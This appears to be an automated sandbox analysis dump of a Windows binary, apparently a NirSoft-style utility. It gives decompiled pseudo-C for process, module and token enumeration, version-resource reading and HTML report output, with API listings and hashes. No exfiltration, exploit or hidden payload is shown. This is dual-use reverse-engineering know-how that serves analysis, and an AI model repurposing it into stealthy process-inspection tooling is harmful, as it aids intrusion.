                                                                                                                • memset.MSVCRT ref: 004064A0
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                  • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                  • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                  • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                • wcscpy.MSVCRT ref: 004064E4
                                                                                                                • wcscpy.MSVCRT ref: 004064F3
                                                                                                                • wcscpy.MSVCRT ref: 00406503
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                • wcscpy.MSVCRT ref: 0040657A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3037099051-2314623505
                                                                                                                • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00409A94(long _a4, intOrPtr _a8) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				int _v16;
                                                                                                                				void* _v20;
                                                                                                                				void* _v24;
                                                                                                                				char _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				char _v52;
                                                                                                                				char _v60;
                                                                                                                				void _v315;
                                                                                                                				char _v316;
                                                                                                                				void _v826;
                                                                                                                				char _v828;
                                                                                                                				void _v1338;
                                                                                                                				char _v1340;
                                                                                                                				void* __esi;
                                                                                                                				void* _t61;
                                                                                                                				_Unknown_base(*)()* _t93;
                                                                                                                				void* _t94;
                                                                                                                				int _t106;
                                                                                                                				void* _t108;
                                                                                                                				void* _t110;
                                                                                                                
                                                                                                                				_v828 = 0;
                                                                                                                				memset( &_v826, 0, 0x1fe);
                                                                                                                				_v1340 = 0;
                                                                                                                				memset( &_v1338, 0, 0x1fe);
                                                                                                                				_t110 = _t108 + 0x18;
                                                                                                                				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                                                				_t113 = _t61;
                                                                                                                				_v20 = _t61;
                                                                                                                				if(_t61 == 0) {
                                                                                                                					L11:
                                                                                                                					if(_v828 == 0) {
                                                                                                                						__eflags = 0;
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                					_push( &_v828);
                                                                                                                					_push( &_v1340);
                                                                                                                					_push(L"%s\\%s");
                                                                                                                					_push(0xff);
                                                                                                                					_push(_a8);
                                                                                                                					L0040B1EC();
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_v8 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                                                				_t106 = _v24;
                                                                                                                				if(_t106 == 0) {
                                                                                                                					_t32 =  &_v20; // 0x4059ec
                                                                                                                					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                                                					_v316 = 0;
                                                                                                                					memset( &_v315, 0, 0xfe);
                                                                                                                					_t110 = _t110 + 0x20;
                                                                                                                					_v16 = 0xff;
                                                                                                                					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L9:
                                                                                                                						CloseHandle(_v20);
                                                                                                                						if(_v8 != 0) {
                                                                                                                							FreeLibrary(_v8);
                                                                                                                						}
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_push( &_v28);
                                                                                                                					_push( &_a4);
                                                                                                                					_push( &_v1340);
                                                                                                                					_push( &_v12);
                                                                                                                					_push( &_v828);
                                                                                                                					_a4 = 0xff;
                                                                                                                					_push( &_v316);
                                                                                                                					L8:
                                                                                                                					_v12 = 0xff;
                                                                                                                					E0040906D( &_v8, _t117);
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_v316 = 0;
                                                                                                                				memset( &_v315, 0, 0xff);
                                                                                                                				_v12 = _t106;
                                                                                                                				_t110 = _t110 + 0xc;
                                                                                                                				_a4 = 0;
                                                                                                                				if(E00408F72( &_v8) == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                                                				if(_t93 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                                                				_t117 = _t94;
                                                                                                                				if(_t94 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_push( &_v28);
                                                                                                                				_push( &_v12);
                                                                                                                				_push( &_v1340);
                                                                                                                				_push( &_v16);
                                                                                                                				_push( &_v828);
                                                                                                                				_push(_v316);
                                                                                                                				_v16 = 0xff;
                                                                                                                				goto L8;
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409AB7
                                                                                                                • memset.MSVCRT ref: 00409ACF
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • memset.MSVCRT ref: 00409B25
                                                                                                                • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                • memset.MSVCRT ref: 00409BC7
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                • API String ID: 3504373036-27875219
                                                                                                                • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409172() {
                                                                                                                				void* _t1;
                                                                                                                				int _t2;
                                                                                                                				struct HINSTANCE__* _t5;
                                                                                                                
                                                                                                                				if( *0x4101bc != 0) {
                                                                                                                					return _t1;
                                                                                                                				}
                                                                                                                				_t2 = E00405436(L"psapi.dll");
                                                                                                                				_t5 = _t2;
                                                                                                                				if(_t5 == 0) {
                                                                                                                					L10:
                                                                                                                					return _t2;
                                                                                                                				} else {
                                                                                                                					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                                                					 *0x40f848 = _t2;
                                                                                                                					if(_t2 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                                                						 *0x40f840 = _t2;
                                                                                                                						if(_t2 != 0) {
                                                                                                                							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                                                                							 *0x40f838 = _t2;
                                                                                                                							if(_t2 != 0) {
                                                                                                                								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                                                								 *0x40fa6c = _t2;
                                                                                                                								if(_t2 != 0) {
                                                                                                                									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                                                									 *0x40f844 = _t2;
                                                                                                                									if(_t2 != 0) {
                                                                                                                										 *0x4101bc = 1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if( *0x4101bc == 0) {
                                                                                                                						_t2 = FreeLibrary(_t5);
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1182944575-70141382
                                                                                                                • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004090EE() {
                                                                                                                				void* _t1;
                                                                                                                				_Unknown_base(*)()* _t2;
                                                                                                                				struct HINSTANCE__* _t4;
                                                                                                                
                                                                                                                				if( *0x4101b8 != 0) {
                                                                                                                					return _t1;
                                                                                                                				}
                                                                                                                				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                				_t4 = _t2;
                                                                                                                				if(_t4 == 0) {
                                                                                                                					L9:
                                                                                                                					return _t2;
                                                                                                                				}
                                                                                                                				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                                				 *0x40f83c = _t2;
                                                                                                                				if(_t2 != 0) {
                                                                                                                					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                                					 *0x40f834 = _t2;
                                                                                                                					if(_t2 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                                						 *0x40f830 = _t2;
                                                                                                                						if(_t2 != 0) {
                                                                                                                							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                                							 *0x40f5c4 = _t2;
                                                                                                                							if(_t2 != 0) {
                                                                                                                								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                                								 *0x40f828 = _t2;
                                                                                                                								if(_t2 != 0) {
                                                                                                                									 *0x4101b8 = 1;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L9;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				char _v1028;
                                                                                                                				void _v1538;
                                                                                                                				char _v1540;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr* _t50;
                                                                                                                				void* _t61;
                                                                                                                
                                                                                                                				_t50 = __ecx;
                                                                                                                				_push(0x1fe);
                                                                                                                				_push(0);
                                                                                                                				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                					_v1540 = 0;
                                                                                                                					memset( &_v1538, ??, ??);
                                                                                                                					_v1028 = 0;
                                                                                                                					memset( &_v1026, 0, 0x1fe);
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v514, 0, 0x1fe);
                                                                                                                					L0040B1EC();
                                                                                                                					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                                					L0040B1EC();
                                                                                                                					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                                					if (_t39 != 0) goto L3;
                                                                                                                					return _t39;
                                                                                                                				}
                                                                                                                				_v516 = 0;
                                                                                                                				memset( &_v514, ??, ??);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fe);
                                                                                                                				L0040B1EC();
                                                                                                                				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                                				L0040B1EC();
                                                                                                                				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                                				void _v8202;
                                                                                                                				short _v8204;
                                                                                                                				void* _t27;
                                                                                                                				short _t29;
                                                                                                                				short _t40;
                                                                                                                				void* _t41;
                                                                                                                				struct HMENU__* _t43;
                                                                                                                				short _t50;
                                                                                                                				void* _t52;
                                                                                                                				struct HMENU__* _t59;
                                                                                                                
                                                                                                                				E0040B550(0x2008, __ecx);
                                                                                                                				_t65 = _a8 - 4;
                                                                                                                				if(_a8 != 4) {
                                                                                                                					__eflags = _a8 - 5;
                                                                                                                					if(_a8 == 5) {
                                                                                                                						_t50 =  *0x40fe2c; // 0x0
                                                                                                                						__eflags = _t50;
                                                                                                                						if(_t50 == 0) {
                                                                                                                							L8:
                                                                                                                							_push(_a12);
                                                                                                                							_t27 = 5;
                                                                                                                							E00405E8D(_t27);
                                                                                                                							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                                                							__eflags = _t29;
                                                                                                                							_a8 = _t29;
                                                                                                                							if(_t29 == 0) {
                                                                                                                								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                                                							}
                                                                                                                							_v8204 = 0;
                                                                                                                							memset( &_v8202, 0, 0x2000);
                                                                                                                							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                                							__eflags = _v8204;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                                                							}
                                                                                                                							EnumChildWindows(_a8, E0040614F, 0);
                                                                                                                							DestroyWindow(_a8);
                                                                                                                						} else {
                                                                                                                							while(1) {
                                                                                                                								_t40 =  *_t50;
                                                                                                                								__eflags = _t40;
                                                                                                                								if(_t40 == 0) {
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                								__eflags = _t40 - _a12;
                                                                                                                								if(_t40 != _a12) {
                                                                                                                									_t50 = _t50 + 4;
                                                                                                                									__eflags = _t50;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push(_a12);
                                                                                                                					_t41 = 4;
                                                                                                                					E00405E8D(_t41);
                                                                                                                					_pop(_t52);
                                                                                                                					_t43 = LoadMenuW(_a4, _a12);
                                                                                                                					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                                                					_t59 = _t43;
                                                                                                                					_push(1);
                                                                                                                					_push(_t59);
                                                                                                                					_push(_a12);
                                                                                                                					E0040605E(_t52, _t65);
                                                                                                                					DestroyMenu(_t59);
                                                                                                                				}
                                                                                                                				L13:
                                                                                                                				return 1;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32 ref: 00406236
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                  • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                  • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                • memset.MSVCRT ref: 004062DA
                                                                                                                • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                  • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				void _v2050;
                                                                                                                				char _v2052;
                                                                                                                				void _v4098;
                                                                                                                				long _v4100;
                                                                                                                				void _v6146;
                                                                                                                				char _v6148;
                                                                                                                				void* __esi;
                                                                                                                				void* _t43;
                                                                                                                				intOrPtr* _t49;
                                                                                                                				intOrPtr* _t57;
                                                                                                                				void* _t58;
                                                                                                                				void* _t59;
                                                                                                                				intOrPtr _t62;
                                                                                                                				intOrPtr _t63;
                                                                                                                
                                                                                                                				_t49 = __ecx;
                                                                                                                				E0040B550(0x1800, __ecx);
                                                                                                                				_t57 = _t49;
                                                                                                                				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                				_v4100 = 0;
                                                                                                                				memset( &_v4098, 0, 0x7fe);
                                                                                                                				_v2052 = 0;
                                                                                                                				memset( &_v2050, 0, 0x7fe);
                                                                                                                				_v6148 = 0;
                                                                                                                				memset( &_v6146, 0, 0x7fe);
                                                                                                                				_t59 = _t58 + 0x24;
                                                                                                                				_t62 =  *0x40fe30; // 0x0
                                                                                                                				if(_t62 != 0) {
                                                                                                                					_push(0x40fe30);
                                                                                                                					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                                					_push(0x400);
                                                                                                                					_push( &_v2052);
                                                                                                                					L0040B1EC();
                                                                                                                					_t59 = _t59 + 0x10;
                                                                                                                				}
                                                                                                                				_t63 =  *0x40fe28; // 0x0
                                                                                                                				if(_t63 != 0) {
                                                                                                                					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                				}
                                                                                                                				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                                				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                                                				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                				_push(0x400);
                                                                                                                				_push( &_v6148);
                                                                                                                				L0040B1EC();
                                                                                                                				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                                                				_t64 = _a8 - 5;
                                                                                                                				if(_a8 == 5) {
                                                                                                                					return E00407D03(_t57, _t64, _a4);
                                                                                                                				}
                                                                                                                				return _t43;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                                                				void _v526;
                                                                                                                				long _v528;
                                                                                                                				wchar_t* _t17;
                                                                                                                				signed int _t40;
                                                                                                                				wchar_t* _t50;
                                                                                                                
                                                                                                                				_t50 = __edi;
                                                                                                                				if(__esi[0] != 0x3a) {
                                                                                                                					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                                					if(_t17 == 0) {
                                                                                                                						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                                                						if(_t40 < 0) {
                                                                                                                							if( *__esi != 0x5c) {
